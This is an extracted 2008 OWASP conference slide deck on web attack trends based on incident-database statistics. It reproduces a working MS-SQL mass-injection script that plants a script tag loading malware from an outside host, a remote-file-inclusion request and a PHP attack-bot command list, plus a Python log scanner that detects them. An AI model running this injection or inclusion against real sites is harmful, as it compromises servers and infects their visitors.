
dd04ff2bbfaf4a23bae1a2f11259e6d1.ppt
- Number of slides: 22
Trends in Web Application Security: What's hot in 2008
Ofer Shezaf, Breach Security
OWASP AppSec Europe, May 2008
Based on the findings of the Web Hacking Incidents Database project
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation, http://www.owasp.org.il
About Myself
http://www.webappsec.org/projects/whid
Ofer Shezaf, VP Product Management, Breach Security
- Great title:
  - Enables me to host the coolest cocktails at every conference.
  - And to sponsor ModSecurity, the open source WAF.
- But don't let the title confuse you: I am an application security guy.
  - Background in national information security.
- Open source and community projects:
  - Officer, Web Application Security Consortium.
  - President, OWASP Israeli chapter.
  - Project Leader, ModSecurity Core Rule Set Project.
  - Project Leader, WASC Web Hacking Incident Database.
- Based out of Tel-Aviv, Israel.
OWASP
Breach Security: Technology Leaders
- We make WAFs:
  - ModSecurity, open source
  - WebDefend, commercial
- Headquarters in Carlsbad, CA, with R&D centers in Herzliya, Israel and London, UK.
- Sole focus is web application security since 1999.
- Best application security DNA in the industry. We wrote the books.
  - Great fun to have Ivan Ristic and Ryan Barnett on your team!
The Challenge of Risk Analysis for Web Application Security
The Web Application Security Risk
Risk = Threat × Vulnerability × Impact
- Applications are vulnerable:
  - Unique, each one exposing its own vulnerabilities.
  - Change frequently, requiring constant tuning of application security.
  - Complex and feature rich with the advent of AJAX, Web Services and Web 2.0.
- Applications are threatened:
  - New business models drive "for profit" hacking.
  - Performed by professionals, enabling complex attacks.
- Potential impact may be severe:
  - Web applications are used for sensitive information and important transactions.
  - Attacks may be targeted at the site's clients.
Threat is Difficult to Assess
- Web attacks are stealthy:
  - Victims hide breaches.
  - Incidents are not detected.
- Statistics are skewed:
  - Defacement (visible) and information leakage (regulated) are publicized more than other breaches.
  - The number of incidents reported is statistically insignificant.
- Most assessments are biased:
  - Believe neither vendors' FUD nor developers' self-assurance.
Available Sources: Vulnerabilities
- Databases:
  - Software: OSVDB, Bugtraq
  - Web sites: XSSed
- Statistics:
  - WASC Statistics Project
  - OWASP Top 10
- Skewed towards vulnerabilities that are easy to find, but are not necessarily actively exploited or do not result in a significant outcome.
  - Good predictor of the level of vulnerability.
  - Not adequate to predict threat or outcome.
Available Sources: Attacks
- Zone-H:
  - The most comprehensive attack repository, very important for public awareness.
  - Reported by hackers and focused on defacements.
  - Lacks for-profit attacks.
  - The "man bites dog" syndrome.
- WASC Distributed Open Proxy Honeypots Project:
  - Monitors attack traffic disguised behind proxies.
  - Shows promise but is still limited in scope.
- Data loss databases (attrition.org):
  - Include any data loss incident:
    - Including lost notebooks, in electronic or paper versions.
  - Address a larger problem than web application security or even IT security.
Available Sources: The OWASP Top 10 2007
- Based on the CVE vulnerability database.
- Minor expert adjustments (CSRF for example).
- Is it related to real world attacks?

The 2007 list, with the slide's callouts:

  A1   Cross Site Scripting (XSS)                              XSS is up, but probably overrated.
  A2   Injection Flaws (including SQL)                         Combining many attacks into A2 allowed so many new entries.
  A3   Malicious File Execution                          New
  A4   Insecure Direct Object Reference                  New
  A5   Cross Site Request Forgery (CSRF)                 New   The new kid in town. Overhyped, but may become a commonly exploited vulnerability in the future.
  A6   Information Leakage and Improper Error Handling
  A7   Broken Authentication and Session Management
  A8   Insecure Cryptographic Storage
  A9   Insecure Communications                           New
  A10  Failure to Restrict URL Access                    New
The Web Hacking Incidents Database
The Web Hacking Incident Database: a Web Application Security Consortium (WASC) project dedicated to recording web application security related incidents.
Database Content
- Incidents since 1999.
- Each incident is classified by:
  - Attack type
  - Outcome
  - Country of the attacked organization
  - Industry segment of the attacked organization
  - Country of origin of the attack
  - Vulnerable software
- Multiple values for a classification are allowed.
- Additional information:
  - A unique identifier: WHID year-id
  - Dates of occurrence and reporting
  - Description
  - Internet references
- RSS feed
Inclusion Criteria
- The database includes only:
  - Publicly disclosed incidents.
  - Web application related incidents:
    - Many times it is hard to know how the network was hacked. We try to read between the lines.
    - Federal Trade Commission (FTC) reports are sometimes helpful, but are often published years later.
  - Incidents of interest:
    - We do not include most mass defacement incidents.
    - Defacements of "high profile" sites are included.
- The criteria:
  - Ensure the quality and correctness of the reported incidents.
  - Severely limit the number of incidents that get in.
  - Are somewhat subjective.
Web Application Security Trends
2007 Summary: Attack Methods
Statistics from the Web Hacking Incidents Database annual report 2007. We can see that:
- CSRF is hyped.
- XSS is overrated.
- Misconfiguration (A10 in 2005) is a huge problem.
- Encryption is not a real issue.
[Chart: 2007 incidents by attack method, labelled with OWASP Top 10 categories A1 to A7 and the old A10]
2007 Summary: Business Motivations for Hacking
- Evenly divided between capitalists and ideologists.
- The picture is skewed, since externally visible incidents force disclosure.
[Chart: 2007 incidents by attack outcome]
2007 Summary: Most Hacked Organizations
[Chart: 2007 incidents by sector of attacked organization]
Chart callouts:
- Government is an ideological target, has weak IT, and a requirement to disclose.
- Like government, plus a need for openness.
- PCI.
- The next big thing.
- I think they are bluffing.
2008 Trends: Economy of Scale
- Finally, large scale business models abusing web app vulnerabilities:
  - The attacked web site is used as an intermediary.
  - The site's value for hackers is its loyal visitors, not the information in or the features of the site.
  - Many smaller sites are hacked.
  - It does not mean that targeted attacks have stopped, but the visibility of the mass attacks is much higher.
- Specific exploits:
  - SQL injection crawlers:
    - Generic injection of iFrame tags into web sites.
    - Attacks began in January and keep intensifying, hacking hundreds of thousands of sites.
  - Web site bot herding:
    - Uploading remotely controlled scripts to web sites.
    - Seen in the field, but no public report yet.
  - Service providers:
    - Security of hosted sites falls through the cracks.
SQL Injection Crawlers
- Specific to the MS-SQL system tables, but could be adapted to other DBs. Default MS-SQL security is somewhat to blame.
- The script brutally modifies ALL fields in the application:
  - Assumes some will be displayed back to the user.
  - Hopes that the application will not be damaged beyond use.
- Easy to detect and to avoid in the first place, yet so many sites were hacked!
  - Simple signatures
  - Database security

The injected script as shown on the slide (the comments carry the slide's callouts):

    -- Select all columns in all user tables
    -- (xtype 99/35/231/167 are the ntext/text/nvarchar/varchar column types)
    DECLARE @T varchar(255), @C varchar(255)
    DECLARE Table_Cursor CURSOR FOR
      select a.name, b.name from sysobjects a, syscolumns b
      where a.id=b.id and a.xtype='u'
      and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    -- Iterate over them
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T, @C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
      -- Append the script tag pointing to malware
      exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar, ['+@C+']))+''<script src=http://www.qiqigm.com/m.js></script>''')
      FETCH NEXT FROM Table_Cursor INTO @T, @C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor
Web Site Bots Herding
The captured request (slide callout: easily detectable):

    GET /XXXX.php?ADODB_DIR=http://www.filmbox.ru/d.pl? HTTP/1.1
    TE: deflate,gzip;q=0.3
    Connection: TE, close
    Host: XXXXXX
    User-Agent: libwww-perl/5.805

Not sure what they tried to exploit. I did not see a successful attack.

Excerpt of the uploaded bot script; the slide labels the first group of commands "Control Methods" and the second "Attack Methods":

    switch(substr($mcmd[0], 1)) {
      case "restart":
      case "mail":       // mail to from subject message
      case "dns":
      case "info":
      case "cmd":
      case "rndnick":
      case "php":
      case "exec":
        break;
      case "pscan":      // .pscan 127.0.0.1 6667
      case "ud.server":  // .udserver <server> <port>
      case "download":
      case "die":
      case "udpflood":
      case "tcpflood":
      case "massmail":
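As an added example (not from the slides or the WHID project), a small Python access-log scanner for the two request patterns of the last two slides: the cursor-based mass SQL injection probe, including the hex-encoded CAST(0x... AS NVARCHAR) variant these crawlers also used, and a remote URL passed as a parameter, as in the ADODB_DIR request. The log lines, domains, marker list and threshold are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit
# Cursor-based mass-injection markers (see the slide): three or more in one request = hit.
SQLI_MARKERS = ("declare", "cursor", "sysobjects", "syscolumns", "exec(", "<script")
RFI_SCHEMES = ("http://", "https://", "ftp://")
# The crawlers also shipped the script hex-encoded in CAST(0x... AS NVARCHAR(4000)).
HEX_LITERAL = re.compile(r"0x((?:[0-9a-f]{2}){4,})", re.I)
# Combined log format: request line, status, size, referer, user agent.
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"')

def decode_hex_literals(text):
    """Replace 0x... literals with their decoded text (UTF-16LE for NVARCHAR payloads)."""
    def repl(m):
        raw = bytes.fromhex(m.group(1))
        return raw.decode("utf-16-le", "replace") if b"\x00" in raw else raw.decode("latin-1")
    return HEX_LITERAL.sub(repl, text)

def normalize(target):
    # Undo percent-encoding twice (double-encoded probes), then decode hex literals.
    return decode_hex_literals(unquote_plus(unquote_plus(target))).lower()

def classify(target):
    """Return 'sqli-crawler', 'rfi' or None for one request target."""
    text = normalize(target)
    if sum(marker in text for marker in SQLI_MARKERS) >= 3:
        return "sqli-crawler"
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    # A parameter whose value is itself a remote URL: the include/bot-herding pattern.
    if any(value.lower().startswith(RFI_SCHEMES) for _, value in params):
        return "rfi"
    return None

def scan_log(lines):
    """Return (verdict, user_agent, target) for every flagged request."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        verdict = classify(m.group("target")) if m else None
        if verdict:
            findings.append((verdict, m.group("ua"), m.group("target")))
    return findings

# Constructed sample log lines (not real traffic), one per case.
_PROBE = "DECLARE @T varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b"
SAMPLE_LOG = [
    '10.0.0.1 - - [12/May/2008:10:00:01 +0000] "GET /page.asp?id=1;' + _PROBE.replace(" ", "%20") + ' HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '10.0.0.2 - - [12/May/2008:10:00:02 +0000] "GET /page.asp?id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x' + _PROBE.encode("utf-16-le").hex() + '%20AS%20NVARCHAR(4000));EXEC(@S) HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
    '10.0.0.3 - - [12/May/2008:10:00:03 +0000] "GET /XXXX.php?ADODB_DIR=http://evil.example/d.pl? HTTP/1.1" 200 10 "-" "libwww-perl/5.805"',
    '10.0.0.4 - - [12/May/2008:10:00:04 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
]
```

Running `scan_log(SAMPLE_LOG)` flags the first three lines and leaves the benign request alone; the hex-encoded probe only trips the marker count because the literal is decoded first.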
Hacking Service Providers
- Mass exploitation of known or zero-day vulnerabilities:
  - Infrastructure software (cPanel, Apache, PHP).
  - Packages installed in each account (blogs, CMS).
- Abuse of legitimate features:
  - Stolen credentials, or accounts purchased using a stolen credit card.
  - File uploads, web based shells, FTP.
- Lack of sufficient separation between sites:
  - Privilege escalation on one site results in breaching all sites.
- Used for spam, phishing, malware planting and installing bots.
Ofer Shezaf, ofers@breach.com
Further information at the WHID web site: http://www.webappsec.org/projects/whid